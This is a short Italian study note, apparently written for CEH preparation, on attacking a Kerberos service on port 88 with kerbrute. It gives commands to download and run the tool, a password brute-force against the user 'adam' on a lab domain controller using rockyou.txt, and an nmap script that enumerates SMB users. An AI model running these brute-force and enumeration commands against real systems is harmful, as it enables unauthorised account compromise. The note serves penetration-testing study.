tags: Kerbrute kerberos Kerberos_Bruteforce
Quando la porta 88 è aperta e ci si presenta il servizio Kerberos possiamo provare ad eseguire diversi attacchi su di esso, per scaricare il software possiamo andare al seguente indirizzo https://github.com/ropnop/kerbrute/releases e scaricare la versione kerbrute_linux_amd64
Poi gli diamo i permessi:
chmod +x kerbrute_linux_amd64E possiamo eseguirlo con i seguenti comando:
Bruteforce utente
./kerbrute_linux_amd64 bruteuser -d SKILL.CEH.com --dc 10.0.0.5 ~/rockyou.txt adam -v In questo caso l’utente è adam, fai attenzione all’ordine dei parametri perchè se no il programma potrebbe non funzionare.
Per vedere quali utenti sono presenti possiamo usare uno script nmap :
nmap --script smb-enum-users.nse -p445 <host>Oppure lo stesso kerbrute, guarda la pagina Kerbrute Enumeration